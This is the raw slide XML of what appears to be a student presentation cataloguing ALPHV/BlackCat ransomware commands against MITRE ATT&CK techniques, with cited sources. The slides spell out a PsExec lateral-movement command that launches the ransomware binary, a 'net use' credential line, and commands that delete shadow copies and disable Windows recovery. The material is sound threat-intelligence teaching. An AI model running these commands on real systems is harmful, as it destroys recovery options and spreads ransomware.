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5778"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="647700" y="1328738"/>
          <a:ext cx="111252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4"/>
                        </a:rPr>
                        <a:t>T1059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Command and Scripting Interpreter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can execute commands on a compromised network with the use of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
                        <a:t>cmd.exe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and wmic.exe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(Clark et al.,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55950" y="5424488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48E109-1677-AD53-CBAD-A2E43739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30999"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="1825625"/>
          <a:ext cx="1072515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75">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="62658098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317145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Detailed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2"/>
                        </a:rPr>
                        <a:t>T1033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Net Use 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 use \\[computer name]  /user:[domain]\[user] [password] /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
                        <a:t>persistent:no</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" dirty="0"/>
                        <a:t> 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3"/>
                        </a:rPr>
                        <a:t>T1570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b="0" dirty="0" err="1"/>
                        <a:t>PsExec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p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psexec.exe -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" dirty="0" err="1"/>
                        <a:t>accepteula</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" dirty="0"/>
                        <a:t> \\&lt;TARGET_HOST&gt; -u &lt;USERNAME&gt; -p &lt;PASSWORD&gt; -s -d -f -c &lt;ALPHV_EXECUTABLE&gt; [FLAGS] [OPTIONS] --access-token &lt;ACCESS_TOKEN&gt; [SUBCOMMAND] </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" dirty="0" err="1"/>
                        <a:t>Bouchrika</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" dirty="0"/>
                        <a:t>, 2023)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4"/>
                        </a:rPr>
                        <a:t>T1059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cmd.exe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5"/>
                        </a:rPr>
                        <a:t>T1490</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" dirty="0"/>
                        <a:t> vssadmin.exe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/>
                        <a:t>vssadmin.exe delete shadows /all /quiet</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-AU" sz="1400" b="0" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" dirty="0"/>
                        <a:t>wmic.exe </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" dirty="0" err="1"/>
                        <a:t>Shadowcopy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" dirty="0"/>
                        <a:t> Delete</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" dirty="0" err="1"/>
                        <a:t>bcdedit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" dirty="0"/>
                        <a:t> /set {default} </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" dirty="0" err="1"/>
                        <a:t>recoveryenabled</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" b="0" dirty="0"/>
                        <a:t> No</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-AU" sz="1400" b="0" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1400" dirty="0"/>
                        <a:t>(Clark et al., 2019)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6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200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>ALPHV/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BlackCat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Ransomware, A.D.D.I. (2023) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>A deep dive into ALPHV/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SecurityScorecard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Available at: https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware/ (Accessed: 22 September 2023). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Bouchrika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, I. (2023)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 (ALPHV)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Varonis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Available at: https://www.varonis.com/blog/blackcat-ransomware (Accessed: 22 September 2023). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Clark, A., Sivakumaran, P. and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Gotlib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, Y. (2019) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Inhibit system recovery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Inhibit System Recovery, Technique T1490 - Enterprise | MITRE ATT&amp;CK®</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Available at: https://attack.mitre.org/techniques/T1490/ (Accessed: 22 September 2023). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Intelligence, M.T. (2022) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The many lives of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Microsoft Security Blog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Available at: https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/ (Accessed: 22 September 2023). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Nagahama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, H. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>et al.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> (2023) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Blackcat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, Software S1068 | MITRE ATT&amp;CK®</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Available at: https://attack.mitre.org/software/S1068/ (Accessed: 22 September 2023). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>T1033, A.R. (2023) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>T1033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https://atomicredteam.io/discovery/T1033/ (Accessed: 22 September 2023). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>T1083, A. (2023) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>T1083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https://atomicredteam.io/discovery/T1083/ (Accessed: 22 September 2023). </a:t>
            </a:r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538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Caleb Davidson</vt:lpstr>
      <vt:lpstr>BlackCat commands</vt:lpstr>
      <vt:lpstr>Detailed commands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13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-14T06:28:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-22T06:19:49Z</dcterms:modified>
</cp:coreProperties>
</file>